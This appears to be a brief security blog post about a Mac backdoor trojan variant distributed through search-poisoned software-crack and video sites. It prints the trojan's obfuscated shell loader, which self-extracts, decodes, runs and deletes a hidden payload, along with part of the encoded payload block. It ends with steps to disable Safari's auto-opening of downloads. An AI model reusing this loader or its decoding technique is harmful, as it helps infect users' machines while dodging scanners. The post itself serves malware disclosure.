iThreats

Last week,  I have spotted a modified version of MacCinema. It was not significant, the modification was purely to avoid scanners detection.

The script looks like this:

#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' |  sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
dne
`
``@"R5V9IY&(W<S-@H68H)78S178F%F"-EC)95D(&!F*J44,G@214%$*H
"%$8X0"*"93505D*U4%+T,44O@2-\@5,F`F0J02(`AB0!!&.B@"2J040PH03M
****content removed****
LU"(B%&=N]F<C!6/T-7:X5F"B,G;)UR9UQ&4@079N)79TY62ODG<A)G8IQT+M
BT#:T%&<*(R8AU69L!'<A)2/,ED5%I@(R@C+T8C+S83,N,3,R(2/21$1!!52M
agazagiz 666 lala

Anyway, this backdoor trojan is massively distributed around the internet. It uses Google SEO, so most users stumbled to these malicious sites from Google search.

Some lures Mac users promising free downloads of full version softwares, cracks, serials, activators, generators, keys, fixes – just like the screenshot below.  

…while other links to Mac videos like this PornTube below.

There are malware serving sites that is bit aggressive, where it does not ask user to download the DMG files instead it automatically downloads and mounts – as it is turned on by default, you can disable automount by following this instruction:

1. Open Safari

2. Open “Preferences” under the “Safari” menu

3. Click on the “General” tab

4. Un-check the “Open ’safe’ files after downloading” box

5. Close Safari’s preferences

This instruction has been previously discussed here.

Stay safe!